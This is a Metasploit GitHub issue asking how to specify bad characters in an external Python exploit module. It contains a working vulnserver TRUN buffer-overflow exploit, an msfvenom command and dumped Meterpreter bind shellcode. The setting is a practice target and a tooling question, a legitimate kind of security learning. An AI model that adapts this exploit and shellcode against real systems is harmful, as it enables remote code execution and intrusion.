search

rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/
Other
34.32k stars 14.02k forks source link

Specifying bad characters for payload in external Python module #18495

Closed simonla82 closed 10 months ago

simonla82 commented 1 year ago

Summary

I try to specify bad characters for the payload in an external Python module of type remote_exploit. However, I can't get it to work and, thus, the payload contains bad characters.

Relevant information

The exploit I am trying to build in a module is for the vulnserver application. Currently my code is:

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

# standard modules
import logging

# extra modules
dependencies_missing = False
try:
    import socket
    import base64
except ImportError:
    dependencies_missing = True

from metasploit import module

metadata = {
    'name': 'Vulnserver Exploit',
    'description': '''
        Some useless description
    ''',
    'authors': [
        'some name'
    ],
    'date': '2023-10-27',
    'license': 'MSF_LICENSE',
    'references': [],
    'type': 'remote_exploit',
    'targets': [
      {'platform':'win', 'arch': 'x86'}
    ],
    'payload': {
        'bad_chars': '\\x00'
    },
    'options': {
        'rhost': {'type': 'address', 'description': 'Target address', 'required': True, 'default': None},
        'rport': {'type': 'port', 'description': 'Target port', 'required': True, 'default': 9999}
    }
}

def run(args):
    module.LogHandler.setup(msg_prefix='{} - '.format(args['rhost']))

    if dependencies_missing:
        logging.error('Module dependency (requests) is missing, cannot continue')
        return

    # Your code here
    try:
        socket.timeout = 1
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        connect = s.connect((args['rhost'], int(args['rport'])))
        s.recv(1024)

        shellcode = base64.b64decode(args['payload_encoded'])
        padding = 2007 * b'a'
        ret_address = b'\xf0\x12\x50\x62' # address of jmp esp gadget
        nop_sled = b'\x90' * 32

        logging.info(ret_address + nop_sled + shellcode)

        s.send(b"TRUN ." + padding + ret_address + nop_sled + shellcode)
        s.close()
    except Exception as e:
        logging.error('{}'.format(e))
        return

if __name__ == '__main__':
    module.run(metadata, run)

And in principle, the exploit is working. If I replace shellcode with the output of msfvenom -p windows/meterpreter/bind_tcp --format py --bad-chars '\x00', I can successfully spawn a Meterpreter session. However, I would like the shellcode to be generated dynamically according to the configured payload and not hard-code it. If I do that, i.e., execute the code as is, payload_encoded gives a payload that contains \x00 bytes, as the output of logging.info(ret_address + nop_sled + shellcode) shows:

[*] 10.11.11.200 - b'\xf0\x12Pb\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xfc\xe8\x8f\x00\x00\x00`\x89\xe51\xd2d\x8bR0\x8bR\x0c\x8bR\x14\x0f\xb7J&1\xff\x8br(1\xc0\xac<a|\x02, \xc1\xcf\r\x01\xc7Iu\xefR\x8bR\x10W\x8bB<\x01\xd0\x8b@x\x85\xc0tL\x01\xd0P\x8bH\x18\x8bX \x01\xd3\x85\xc9t<1\xffI\x8b4\x8b\x01\xd61\xc0\xc1\xcf\r\xac\x01\xc78\xe0u\xf4\x03}\xf8;}$u\xe0X\x8bX$\x01\xd3f\x8b\x0cK\x8bX\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89D$$[[aYZQ\xff\xe0X_Z\x8b\x12\xe9\x80\xff\xff\xff]h32\x00\x00hws2_ThLw&\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00)\xc4TPh)\x80k\x00\xff\xd5j\nh\n\x0b\x0b\x0bh\x02\x00\x11\\\x89\xe6PPPP@P@Ph\xea\x0f\xdf\xe0\xff\xd5\x97j\x10VWh\x99\xa5ta\xff\xd5\x85\xc0t\x0c\xffN\x08u\xech\xf0\xb5\xa2V\xff\xd5j\x00j\x04VWh\x02\xd9\xc8_\xff\xd5\x8b6j@h\x00\x10\x00\x00Vj\x00hX\xa4S\xe5\xff\xd5\x93Sj\x00VSWh\x02\xd9\xc8_\xff\xd5\x01\xc3)\xc6u\xee\xc3'

So, how can I specify bad characters in an external Python module?

Any help is highly appreciated!

adfoster-r7 commented 1 year ago

I'm not sure if this functionality already exists in the Python support or not; but it would be very easy to migrate this to be written using Ruby if any help is needed :+1:

github-actions[bot] commented 11 months ago

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

github-actions[bot] commented 10 months ago

Hi again!

It’s been 60 days since anything happened on this issue, so we are going to close it. Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.